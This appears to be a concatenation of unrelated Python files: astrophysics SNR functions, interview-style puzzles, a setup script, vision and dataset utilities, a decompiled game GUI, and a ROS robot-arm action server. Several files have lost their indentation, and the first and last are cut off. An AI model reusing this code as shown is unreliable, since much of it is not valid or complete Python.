h_c_lisa_2 = (2 * f_orb_evol)**2 * h_f_lisa_2
snr = np.trapz(y=h_c_n_2 / h_c_lisa_2, x=2 * f_orb_evol, axis=1)**0.5
return snr.decompose()
def snr_ecc_evolving(m_1, m_2, f_orb_i, dist, ecc, harmonics_required, t_obs, n_step,
position=None, polarisation=None, inclination=None, t_merge=None,
interpolated_g=None, interpolated_sc=None, n_proc=1,
ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
instrument="LISA", custom_psd=None):
"""Computes SNR for eccentric and evolving sources.
Note that this function will not work for exactly circular (ecc = 0.0)
binaries.
Parameters
----------
m_1 : `float/array`
Primary mass
m_2 : `float/array`
Secondary mass
f_orb_i : `float/array`
Initial orbital frequency
dist : `float/array`
Distance to the source
ecc : `float/array`
Eccentricity
harmonics_required : `int`
Maximum integer harmonic to compute
t_obs : `float`
Total duration of the observation
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
n_step : `int`
Number of time steps during observation duration
t_merge : `float/array`
Time until merger
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
n_proc : `int`
Number of processors to split eccentricity evolution over, where
the default is n_proc=1
ret_max_snr_harmonic : `boolean`
Whether to return (in addition to the snr), the harmonic with the maximum SNR
ret_snr2_by_harmonic : `boolean`
Whether to return the SNR^2 in each individual harmonic rather than the total.
        The total can be retrieved by summing and then taking the square root.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
max_snr_harmonic : `int/array`
harmonic with maximum SNR for each binary (only returned if
``ret_max_snr_harmonic=True``)
"""
m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
# calculate minimum of observation time and merger time
if t_merge is None:
t_merge = evol.get_t_merge_ecc(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i, ecc_i=ecc)
t_before = 0.1 * u.yr
t_evol = np.minimum(t_merge - t_before, t_obs).to(u.s)
# get eccentricity and f_orb evolutions
e_evol, f_orb_evol = evol.evol_ecc(ecc_i=ecc, t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2,
f_orb_i=f_orb_i, n_proc=n_proc, t_before=t_before, t_merge=t_merge)
maxes = np.where(np.logical_and(e_evol == 0.0, f_orb_evol == 1e2 * u.Hz),
-1 * u.Hz, f_orb_evol).max(axis=1)
for source in range(len(f_orb_evol)):
f_orb_evol[source][f_orb_evol[source] == 1e2 * u.Hz] = maxes[source]
# create harmonics list and multiply for nth frequency evolution
harms = np.arange(1, harmonics_required + 1).astype(int)
f_n_evol = harms[np.newaxis, np.newaxis, :] * f_orb_evol[..., np.newaxis]
# calculate the characteristic strain
h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=e_evol, n=harms, dist=dist,
position=position, polarisation=polarisation, inclination=inclination,
interpolated_g=interpolated_g)**2
# calculate the characteristic noise power
if interpolated_sc is not None:
h_f_lisa = interpolated_sc(f_n_evol.flatten())
else:
h_f_lisa = psd.power_spectral_density(f=f_n_evol.flatten(), t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
h_f_lisa = h_f_lisa.reshape(f_n_evol.shape)
h_c_lisa_2 = f_n_evol**2 * h_f_lisa
snr_evol = h_c_n_2 / h_c_lisa_2
# integrate, sum and square root to get SNR
snr_n_2 = np.trapz(y=snr_evol, x=f_n_evol, axis=1)
if ret_snr2_by_harmonic:
return snr_n_2
snr_2 = snr_n_2.sum(axis=1)
snr = np.sqrt(snr_2)
if ret_max_snr_harmonic:
max_snr_harmonic = np.argmax(snr_n_2, axis=1) + 1
return snr, max_snr_harmonic
else:
return snr
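# A short usage sketch for the circular, stationary case (added; the masses,
# frequencies and distances below are illustrative values only):
if __name__ == "__main__":
    m_c = np.array([0.3, 0.6]) * u.Msun      # chirp masses
    f_orb = np.array([1e-3, 3e-3]) * u.Hz    # orbital frequencies
    dist = np.array([1.0, 8.0]) * u.kpc      # distances
    print(snr_circ_stationary(m_c=m_c, f_orb=f_orb, dist=dist, t_obs=4 * u.yr))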
|
python
|
"""
QUESTION:
This is an interview question asked by Amazon.
There exists a staircase with N steps, and you can climb up either 1 or 2 steps at a time.
Given N, write a function that returns the number of unique ways you can climb the staircase. The order of the steps matters.
For example, if N is 4, then there are 5 unique ways:
1, 1, 1, 1
2, 1, 1
1, 2, 1
1, 1, 2
2, 2
"""
def staircase(s):
    return s if s <= 3 else (staircase(s-1) + staircase(s-2))
staircase(4)
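# An equivalent iterative version (added sketch) that avoids the exponential
# recursion of the answer above for large N:
def staircase_iterative(s):
    a, b = 1, 2  # ways to climb a staircase of 1 step and of 2 steps
    for _ in range(s - 2):
        a, b = b, a + b
    return a if s < 2 else b


print(staircase_iterative(4))  # 5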
|
python
|
#!/usr/bin/env python
from setuptools import setup
setup(name='dvaclient',
version='1.0',
description='Deep Video Analytics Client',
author='Akshay Bhat',
author_email='[email protected]',
url='https://www.deepvideoanalytics.com/',
packages=['dvaclient'],
package_data={'dvaclient': ['schema.json']},
include_package_data=True,
install_requires=[
'jsonschema',
'requests'
],
)
|
python
|
from chainer.backends import cuda
import numpy as np
def mask_to_bbox(mask):
"""Compute the bounding boxes around the masked regions.
This function accepts both :obj:`numpy.ndarray` and :obj:`cupy.ndarray` as
inputs.
Args:
mask (array): An array whose shape is :math:`(R, H, W)`.
:math:`R` is the number of masks.
The dtype should be :obj:`numpy.bool`.
Returns:
array:
The bounding boxes around the masked regions.
This is an array whose shape is :math:`(R, 4)`.
:math:`R` is the number of bounding boxes.
The dtype should be :obj:`numpy.float32`.
"""
R, H, W = mask.shape
xp = cuda.get_array_module(mask)
instance_index, ys, xs = xp.nonzero(mask)
bbox = xp.zeros((R, 4), dtype=np.float32)
for i in range(R):
ys_i = ys[instance_index == i]
xs_i = xs[instance_index == i]
if len(ys_i) == 0:
continue
y_min = ys_i.min()
x_min = xs_i.min()
y_max = ys_i.max() + 1
x_max = xs_i.max() + 1
bbox[i] = xp.array([y_min, x_min, y_max, x_max], dtype=np.float32)
return bbox
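# A small usage sketch (added) with a NumPy boolean mask; CuPy arrays are
# handled the same way through chainer.backends.cuda:
if __name__ == "__main__":
    mask = np.zeros((1, 5, 5), dtype=bool)
    mask[0, 1:3, 2:5] = True
    print(mask_to_bbox(mask))  # expected: [[1. 2. 3. 5.]]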
|
python
|
from draco.programs import constraints, definitions, generate, hard, helpers
def test_has_definitions():
assert len(definitions.program)
assert len(definitions.blocks)
def test_definitions_has_marktype():
assert "mark_type" in definitions.blocks
def test_has_constraints():
assert len(constraints.program)
assert len(constraints.blocks)
def test_constraints_has_invalid_domain():
assert "invalid_domain" in constraints.blocks
def test_has_generate():
assert len(generate.program)
assert len(generate.blocks)
def test_generate_has_marktype():
assert "mark_type" in generate.blocks
def test_has_hard():
assert len(hard.program)
assert len(hard.blocks)
def test_has_helpers():
assert len(helpers.program)
assert len(helpers.blocks)
|
python
|
from wpilib import DigitalInput
import robotmap
gear_mech_switch = None
def init():
"""
Initialize switch objects.
"""
global gear_mech_switch
gear_mech_switch = DigitalInput(robotmap.switches.gear_switch_channel)
|
python
|
class Solution:
def multiply(self, T, M):
a = (T[0][0] * M[0][0] + T[0][1] * M[1][0] + T[0][2] * M[2][0])
b = (T[0][0] * M[0][1] + T[0][1] * M[1][1] + T[0][2] * M[2][1])
c = (T[0][0] * M[0][2] + T[0][1] * M[1][2] + T[0][2] * M[2][2])
d = (T[1][0] * M[0][0] + T[1][1] * M[1][0] + T[1][2] * M[2][0])
e = (T[1][0] * M[0][1] + T[1][1] * M[1][1] + T[1][2] * M[2][1])
f = (T[1][0] * M[0][2] + T[1][1] * M[1][2] + T[1][2] * M[2][2])
g = (T[2][0] * M[0][0] + T[2][1] * M[1][0] + T[2][2] * M[2][0])
h = (T[2][0] * M[0][1] + T[2][1] * M[1][1] + T[2][2] * M[2][1])
i = (T[2][0] * M[0][2] + T[2][1] * M[1][2] + T[2][2] * M[2][2])
T[0][0] = a
T[0][1] = b
T[0][2] = c
T[1][0] = d
T[1][1] = e
T[1][2] = f
T[2][0] = g
T[2][1] = h
T[2][2] = i
def power(self, T, n):
if n == 0 or n == 1: return
self.power(T, n // 2)
self.multiply(T, T)
if n % 2: self.multiply(T, [[1, 1, 1], [1, 0, 0], [0, 1, 0]])
def tribonacci(self, n: int) -> int:
if n == 0: return 0
if n <= 2: return 1
T = [[1, 1, 1], [1, 0, 0], [0, 1, 0]]
self.power(T, n - 1)
return T[0][0]
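# A quick sanity check (added sketch): compare the matrix-power result above
# with a straightforward iterative computation of the tribonacci sequence.
if __name__ == "__main__":
    def trib_iter(n):
        a, b, c = 0, 1, 1
        for _ in range(n):
            a, b, c = b, c, a + b + c
        return a

    s = Solution()
    print([s.tribonacci(i) for i in range(8)])  # [0, 1, 1, 2, 4, 7, 13, 24]
    print([trib_iter(i) for i in range(8)])     # same sequence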
|
python
|
# [START method_one]
# [START method_two]
def _bar():
return 'Underscores in method names denote helper methods.'
# [END method_one]
# [END method_two]
# [START method_one]
def return_one():
return 1
# [END method_one]
# [START method_two]
def return_two():
return 2
# [END method_two]
|
python
|
class Song:
"""Class to represent a song
Attributes:
title (str): The title of the song
artist (Artist): An artist object representing the songs creator.
duration (int): The duration of the song in seconds. May be zero
"""
def __init__(self, title, artist, duration=0):
self.title = title
self.artist = artist
self.duration = duration
class Album:
"""Class to represent an Album, using it's track list
Attributes:
album_name (str): The name of the album.
        year (int): The year the album was released.
        artist (Artist): The artist responsible for the album. If not specified,
the artist will default to an artist with the name "Various Artists".
tracks (List[Song]): A list of the songs on the album.
Methods:
add_song: Used to add a new song to the album's track list.
"""
def __init__(self, name, year, artist=None):
self.name = name
self.year = year
if artist is None:
self.artist = Artist("Various Artists")
else:
self.artist = artist
self.tracks = []
def add_song(self, song, position=None):
"""Adds a song to the track list
Args:
song (Song): A song to add.
position (Optional[int]): If specified, the song will be added to that position
in the track list - inserting it between other songs if necessary.
Otherwise, the song will be added to the end of the list.
"""
if position is None:
self.tracks.append(song)
else:
self.tracks.insert(position, song)
# help(Song)
# help(Song.__init__)
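# A small usage sketch (added). The Artist class is not part of this fragment,
# so a minimal stand-in with just a name attribute is assumed here.
if __name__ == "__main__":
    class Artist:
        def __init__(self, name):
            self.name = name

    beatles = Artist("The Beatles")
    album = Album("Abbey Road", 1969, beatles)
    album.add_song(Song("Come Together", beatles, 259))
    album.add_song(Song("Something", beatles, 183), position=1)
    print([track.title for track in album.tracks])  # ['Come Together', 'Something']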
|
python
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.piratesgui.BarSelectionMenu
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from direct.directnotify import DirectNotifyGlobal
from otp.otpbase import OTPGlobals
from pirates.piratesgui import GuiPanel
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.reputation import ReputationGlobals
from pirates.battle import WeaponGlobals
from pirates.economy import EconomyGlobals
from pirates.economy.EconomyGlobals import *
from pirates.piratesbase import Freebooter
from pirates.inventory import ItemGlobals
class BarSelectionMenu(GuiPanel.GuiPanel):
__module__ = __name__
notify = DirectNotifyGlobal.directNotify.newCategory('BarSelectionMenu')
ICON_WIDTH = 0.13
HEIGHT = 0.15
SelectionDelay = 0.6
def __init__(self, items, command=None):
GuiPanel.GuiPanel.__init__(self, None, 1.0, self.HEIGHT, showClose=0)
self.items = items
self.icons = []
self.hotkeys = []
self.repMeters = []
self.choice = 0
self.command = command
self.hideTask = None
card = loader.loadModel('models/textureCards/selectionGui')
texCard = card.find('**/main_gui_general_box_over')
self.cursor = DirectFrame(parent=self, state=DGG.DISABLED, relief=None, frameSize=(0,
0.08,
0,
0.08), pos=(0.08,
0,
0.07), geom=texCard, geom_scale=0.12)
self.cursor.setTransparency(1)
self.cursor.resetFrameSize()
card.removeNode()
self.initialiseoptions(BarSelectionMenu)
self.card = loader.loadModel('models/gui/gui_icons_weapon')
self.accept('escape', self.__handleCancel)
self.loadWeaponButtons()
self.hide()
return
def loadWeaponButtons(self):
for hotkey in self.hotkeys:
hotkey.destroy()
self.hotkeys = []
for icon in self.icons:
icon.destroy()
self.icons = []
for repMeter in self.repMeters:
repMeter.destroy()
self.repMeters = []
self['frameSize'] = (
0, self.ICON_WIDTH * len(self.items) + 0.04, 0, self.HEIGHT)
self.setX(-((self.ICON_WIDTH * len(self.items) + 0.04) / 2.0))
topGui = loader.loadModel('models/gui/toplevel_gui')
kbButton = topGui.find('**/keyboard_button')
for i in range(len(self.items)):
if self.items[i]:
category = WeaponGlobals.getRepId(self.items[i][0])
icon = DirectFrame(parent=self, state=DGG.DISABLED, relief=None, frameSize=(0,
0.08,
0,
0.08), pos=(self.ICON_WIDTH * i + 0.08, 0, 0.082))
icon.setTransparency(1)
hotkeyText = 'F%s' % self.items[i][1]
hotkey = DirectFrame(parent=icon, state=DGG.DISABLED, relief=None, text=hotkeyText, text_align=TextNode.ACenter, text_scale=0.045, text_pos=(0,
0), text_fg=PiratesGuiGlobals.TextFG2, text_shadow=PiratesGuiGlobals.TextShadow, image=kbButton, image_scale=0.06, image_pos=(0,
0,
0.01), image_color=(0.5,
0.5,
0.35,
1), pos=(0,
0,
0.08))
self.hotkeys.append(hotkey)
category = WeaponGlobals.getRepId(self.items[i][0])
if Freebooter.getPaidStatus(base.localAvatar.getDoId()) or Freebooter.allowedFreebooterWeapon(category):
asset = ItemGlobals.getIcon(self.items[i][0])
if asset:
texCard = self.card.find('**/%s' % asset)
icon['geom'] = texCard
icon['geom_scale'] = 0.08
icon.resetFrameSize()
self.icons.append(icon)
else:
texCard = topGui.find('**/pir_t_gui_gen_key_subscriber*')
icon['geom'] = texCard
icon['geom_scale'] = 0.2
icon.resetFrameSize()
self.icons.append(icon)
repMeter = DirectWaitBar(parent=icon, relief=DGG.SUNKEN, state=DGG.DISABLED, borderWidth=(0.002,
0.002), range=0, value=0, frameColor=(0.24,
0.24,
0.21,
1), barColor=(0.8,
0.8,
0.7,
1), pos=(-0.05, 0, -0.0525), hpr=(0,
0,
0), frameSize=(0.005,
0.095,
0,
0.0125))
self.repMeters.append(repMeter)
inv = base.localAvatar.getInventory()
if inv:
repValue = inv.getReputation(category)
level, leftoverValue = ReputationGlobals.getLevelFromTotalReputation(category, repValue)
max = ReputationGlobals.getReputationNeededToLevel(category, level)
repMeter['range'] = max
repMeter['value'] = leftoverValue
return
def selectPrev(self):
if len(self.items) < 1:
return
self.show()
if len(self.items) > 1:
keepTrying = True
else:
keepTrying = False
while keepTrying:
keepTrying = False
self.choice = self.choice - 1
if self.choice < 0 or self.choice > len(self.items) - 1:
self.choice = len(self.items) - 1
if not Freebooter.getPaidStatus(base.localAvatar.getDoId()):
if self.items[self.choice]:
category = WeaponGlobals.getRepId(self.items[self.choice][0])
if not Freebooter.allowedFreebooterWeapon(category):
keepTrying = True
else:
keepTrying = True
self.cursor.setPos(self.ICON_WIDTH * self.choice + 0.08, 0, 0.072)
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hideTask = taskMgr.doMethodLater(self.SelectionDelay, self.confirmSelection, 'BarSelectHideTask' + str(self.getParent()), extraArgs=[])
def selectNext(self):
if len(self.items) < 1:
return
self.show()
if len(self.items) > 1:
keepTrying = True
else:
keepTrying = False
while keepTrying:
keepTrying = False
self.choice = self.choice + 1
if self.choice > len(self.items) - 1:
self.choice = 0
if not Freebooter.getPaidStatus(base.localAvatar.getDoId()):
category = WeaponGlobals.getRepId(self.items[self.choice][0])
if not Freebooter.allowedFreebooterWeapon(category):
keepTrying = True
self.cursor.setPos(self.ICON_WIDTH * self.choice + 0.08, 0, 0.072)
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hideTask = taskMgr.doMethodLater(self.SelectionDelay, self.confirmSelection, 'BarSelectHideTask' + str(self.getParent()), extraArgs=[])
def selectChoice(self, weaponId):
if len(self.items) < 1:
return
if weaponId not in self.items:
return
self.show()
self.choice = self.items.index(weaponId)
self.cursor.setPos(self.ICON_WIDTH * self.choice + 0.08, 0, 0.072)
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hideTask = taskMgr.doMethodLater(self.SelectionDelay * 2, self.hide, 'BarSelectHideTask' + str(self.getParent()), extraArgs=[])
def confirmSelection(self):
self.hide()
if self.command and self.choice < len(self.items):
self.command(self.items[self.choice][0], self.items[self.choice][1], fromWheel=1)
def update(self, items):
if self.items != items:
self.items = items
self.loadWeaponButtons()
def updateRep(self, category, value):
for i in range(len(self.items)):
repId = WeaponGlobals.getRepId(self.items[i][0])
if repId == category:
level, leftoverValue = ReputationGlobals.getLevelFromTotalReputation(category, value)
max = ReputationGlobals.getReputationNeededToLevel(category, level)
if len(self.repMeters) - 1 >= i:
self.repMeters[i]['range'] = max
self.repMeters[i]['value'] = leftoverValue
def destroy(self):
if hasattr(self, 'destroyed'):
return
self.destroyed = 1
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.ignore('escape')
for icon in self.icons:
icon.destroy()
icon = None
self.icons = []
if self.card:
self.card.removeNode()
self.card = None
GuiPanel.GuiPanel.destroy(self)
return
def __handleCancel(self):
taskMgr.remove('BarSelectHideTask' + str(self.getParent()))
self.hide()
for item in self.items:
if item:
index = localAvatar.currentWeaponId == item[0] and self.items.index(item)
self.choice = index
return
def hide(self):
if hasattr(base, 'localAvatar'):
if hasattr(localAvatar.guiMgr.combatTray, 'skillTray'):
localAvatar.guiMgr.combatTray.skillTray.show()
GuiPanel.GuiPanel.hide(self)
|
python
|
import argparse
from paz.pipelines import SSD300FAT, SSD300VOC, SSD512COCO, SSD512YCBVideo
from paz.backend.camera import VideoPlayer, Camera
import tensorflow as tf
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
    tf.config.experimental.set_memory_growth(gpus[0], True)
parser = argparse.ArgumentParser(description='SSD object detection demo')
parser.add_argument('-c', '--camera_id', type=int, default=0,
help='Camera device ID')
parser.add_argument('-s', '--score_thresh', type=float, default=0.6,
help='Box/class score threshold')
parser.add_argument('-n', '--nms_thresh', type=float, default=0.45,
help='non-maximum suppression threshold')
parser.add_argument('-d', '--dataset', type=str, default='VOC',
choices=['VOC', 'COCO', 'YCBVideo', 'FAT'],
help='Dataset name')
args = parser.parse_args()
name_to_model = {'VOC': SSD300VOC,
'FAT': SSD300FAT,
'COCO': SSD512COCO,
'YCBVideo': SSD512YCBVideo}
pipeline = name_to_model[args.dataset]
detect = pipeline(args.score_thresh, args.nms_thresh)
camera = Camera(args.camera_id)
player = VideoPlayer((1280, 960), detect, camera)
player.run()
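# Example invocation (the script filename below is a placeholder for illustration):
#   python object_detection_demo.py --dataset COCO --score_thresh 0.5 --camera_id 0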
|
python
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, SRI International
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of SRI International nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Acorn Pooley, Mike Lautman
# 7/11/18: Updated for use by Robust Autonomy and Decisions Group by Samantha Kim
# Action code based on ROS wiki tutorial "Writing a Simple Action Server using the
# Execute Callback (Python)".
import sys
import copy
import rospy
import tf
import actionlib
import object_experiments.msg
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
class MoveGroupPythonInterface(object):
def __init__(self):
super(MoveGroupPythonInterface, self).__init__()
## Initialize `moveit_commander`_ and a `rospy`_ node:
moveit_commander.roscpp_initialize(sys.argv)
## Instantiate a `RobotCommander`_ object. This object is the outer-level interface to
## the robot:
robot = moveit_commander.RobotCommander()
## Instantiate a `PlanningSceneInterface`_ object. This object is an interface
## to the world surrounding the robot:
scene = moveit_commander.PlanningSceneInterface()
## Instantiate a `MoveGroupCommander`_ object. This object is an interface
## to one group of joints. In this case the group is the joints in the Panda
## arm so we set ``group_name = panda_arm``. If you are using a different robot,
## you should change this value to the name of your robot arm planning group.
## This interface can be used to plan and execute motions on the Panda:
group_name = "manipulator"
group = moveit_commander.MoveGroupCommander(group_name)
# Initialize velocity and acceleration scaling factors to prevent
# overly fast movements. Can be changed later using the go_to_pose_goal
# and go_to_joint_state functions.
group.set_max_acceleration_scaling_factor(0.1)
group.set_max_velocity_scaling_factor(0.1)
## Create a `DisplayTrajectory`_ publisher which may be used to publish
## trajectories for RViz to visualize:
display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',
moveit_msgs.msg.DisplayTrajectory,
queue_size=20)
# Print name of the reference frame for this robot:
planning_frame = group.get_planning_frame()
print "============ Reference frame: %s" % planning_frame
# Print the name of the end-effector link for this group:
eef_link = group.get_end_effector_link()
print "============ End effector: %s" % eef_link
# List of all the groups in the robot:
group_names = robot.get_group_names()
print "============ Robot Groups:", robot.get_group_names()
# Print the state of the robot:
print "============ Printing robot state"
print robot.get_current_state()
print ""
# Misc variables
self.box_name = ''
self.robot = robot
self.scene = scene
self.group = group
self.display_trajectory_publisher = display_trajectory_publisher
self.planning_frame = planning_frame
self.eef_link = eef_link
self.group_names = group_names
def knock_blocks(self):
"""
Function: knock_blocks
----------------------------------
UR10 will go to a pre-collision pose, bend at the elbow joint,
colliding with the block setup, and return to a neutral pose.
Poses were found using the teaching pendant.
"""
# Init pose
init_pose = geometry_msgs.msg.Pose()
init_pose.position.x = -0.488798937651
init_pose.position.y = 0.104866858129
init_pose.position.z = -1.0074033753
init_pose.orientation.x = 0.495021656851
init_pose.orientation.y = 0.516180354965
init_pose.orientation.z = -0.48224425657
init_pose.orientation.w = 0.505916868074
# Pre-collision pose
pre_coll_pose = geometry_msgs.msg.Pose()
pre_coll_pose.position.x = -0.558980015093
pre_coll_pose.position.y = 0.290542710322
pre_coll_pose.position.z = -1.04752385597
pre_coll_pose.orientation.x = 0.485564471115
pre_coll_pose.orientation.y = 0.524631938133
pre_coll_pose.orientation.z = -0.503994513944
pre_coll_pose.orientation.w = 0.484745297859
# Post-collision pose
post_coll_pose = geometry_msgs.msg.Pose()
post_coll_pose.position.x = -0.397289172218
post_coll_pose.position.y = 0.290860833622
post_coll_pose.position.z = -1.07770150547
post_coll_pose.orientation.x = 0.485054814234
post_coll_pose.orientation.y = 0.524070568573
post_coll_pose.orientation.z = -0.504404664407
post_coll_pose.orientation.w = 0.485448275813
self.go_to_pose_goal(pre_coll_pose, .1, .1)
# Post-collision joint state
post_coll_joint_goal = self.group.get_current_joint_values()
post_coll_joint_goal[3] -= pi / 6
self.go_to_joint_state(post_coll_joint_goal, .1, .1)
self.go_to_pose_goal(init_pose, .1, .1)
def go_to_joint_state(self, joint_goal, velocity, acceleration):
"""
Function: go_to_joint_state
------------------------------------
Moves the robot to the specified joint state with the
specified velocity and acceleration. Velocity
and acceleration are values between [0,1], corresponding
to the scaling factor for the reduction of the maximum
joint velocity and acceleration.
"""
# Set velocity and acceleration scaling factors.
self.group.set_max_velocity_scaling_factor(velocity)
self.group.set_max_acceleration_scaling_factor(acceleration)
self.group.go(joint_goal, wait=True)
# Calling ``stop()`` ensures that there is no residual movement
self.group.stop()
def go_to_pose_goal(self, pose_goal, velocity, acceleration):
"""
Function: go_to_pose_goal
------------------------------------
Plans a pose goal and executes the path. This method is preferable
to cartesian path planning and execution because velocity and
acceleration limitations can be set.
"""
# Set velocity and acceleration scaling factors.
self.group.set_max_velocity_scaling_factor(velocity)
self.group.set_max_acceleration_scaling_factor(acceleration)
# Add pose goals and execute path
self.group.set_pose_target(pose_goal)
plan = self.group.go(wait=True)
# Calling `stop()` ensures that there is no residual movement
self.group.stop()
# It is always good to clear your targets after planning with poses.
# Note: there is no equivalent function for clear_joint_value_targets()
self.group.clear_pose_targets()
def get_formatted_current_pose(self, pose_name):
"""
Function: get_formatted_current_pose
------------------------------------
Prints to screen the current pose of the robot in a format that allows
for easy hardcoding of a particular pose.
"""
current_pose = self.group.get_current_pose()
print pose_name + " = geometry_msgs.msg.Pose()"
print pose_name + ".position.x = " + str(current_pose.pose.position.x)
print pose_name + ".position.y = " + str(current_pose.pose.position.y)
print pose_name + ".position.z = " + str(current_pose.pose.position.z)
print pose_name + ".orientation.x = " + str(current_pose.pose.orientation.x)
print pose_name + ".orientation.y = " + str(current_pose.pose.orientation.y)
print pose_name + ".orientation.z = " + str(current_pose.pose.orientation.z)
print pose_name + ".orientation.w = " + str(current_pose.pose.orientation.w)
class Choreography(object):
"""
Set up an Action Server that expects ChoreographyAction messages.
When a ChoreographyAction goal is received, it executes the type of
choreography specified by the message.
"""
feedback = object_experiments.msg.ChoreographyFeedback()
result = object_experiments.msg.ChoreographyResult()
success = True
def __init__(self, name):
self.action_name = name
self.server = actionlib.SimpleActionServer(self.action_name,
object_experiments.msg.ChoreographyAction,
self.execute,
auto_start = False)
self.server.start()
print("ActionServer initialized.")
def execute(self,goal):
self.success = True
rospy.loginfo('Starting choreography: %s' % (goal))
execute_choreography(goal)
if self.success:
rospy.loginfo('%s: Succeeded' % self.action_name)
self.server.set_succeeded(self.result)
def check_preempt(self):
if self.server.is_preempt_requested():
            rospy.loginfo('%s: Preempted' % self.action_name)
self.server.set_preempted()
self.success = False
return False
return True
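# --- Minimal client sketch (illustrative; not part of the original node) ---
# Assumption: ChoreographyGoal carries a std_msgs/String field named
# ``choreography`` (matching how execute() reads goal.choreography.data), and
# the action server above is registered under the node name 'choreography'.
def send_choreography(name):
    client = actionlib.SimpleActionClient('choreography',
                                          object_experiments.msg.ChoreographyAction)
    client.wait_for_server()
    goal = object_experiments.msg.ChoreographyGoal(choreography=String(data=name))
    client.send_goal(goal)
    client.wait_for_result()
    return client.get_result()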
def execute_choreography(goal):
"""
Function: execute_choreography
------------------------------------
Executes the choreography specified as a goal.
Additional choreography options should be included here
as if/elif cases.
"""
try:
# Initialize MoveIt commander
robot_commander = MoveGroupPythonInterface()
# Execute choreography
print("Executing: " + goal.choreography.data)
if goal.choreography.data == "knock_blocks":
robot_commander.knock_blocks()
elif goal.choreography.data == "get_formatted_current_pose":
robot_commander.get_formatted_current_pose("your_pose_name")
print "============ Choreography complete!"
except rospy.ROSInterruptException:
return
except KeyboardInterrupt:
return
if __name__ == '__main__':
rospy.init_node('choreography')
server = Choreography(rospy.get_name())
rospy.spin()
|
python
|
import os
import urllib.request
import zipfile
from random import shuffle
from math import floor
def download_dataset():
    print('Beginning dataset download with urllib')
url = "http://cs231n.stanford.edu/tiny-imagenet-200.zip"
path = "%s/tiny-imagenet-200.zip" % os.getcwd()
urllib.request.urlretrieve(url, path)
print("Dataset downloaded")
def unzip_data():
path_to_zip_file = "%s/tiny-imagenet-200.zip" % os.getcwd()
directory_to_extract_to = os.getcwd()
print("Extracting zip file: %s" % path_to_zip_file)
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(directory_to_extract_to)
print("Extracted at: %s" % directory_to_extract_to)
def format_val():
val_dir = "%s/tiny-imagenet-200/val" % os.getcwd()
print("Formatting: %s" % val_dir)
val_annotations = "%s/val_annotations.txt" % val_dir
val_dict = {}
with open(val_annotations, 'r') as f:
for line in f:
line = line.strip().split()
assert(len(line) == 6)
wnind = line[1]
img_name = line[0]
boxes = '\t'.join(line[2:])
if wnind not in val_dict:
val_dict[wnind] = []
entries = val_dict[wnind]
entries.append((img_name, boxes))
assert(len(val_dict) == 200)
for wnind, entries in val_dict.items():
val_wnind_dir = "%s/%s" % (val_dir, wnind)
val_images_dir = "%s/images" % val_dir
val_wnind_images_dir = "%s/images" % val_wnind_dir
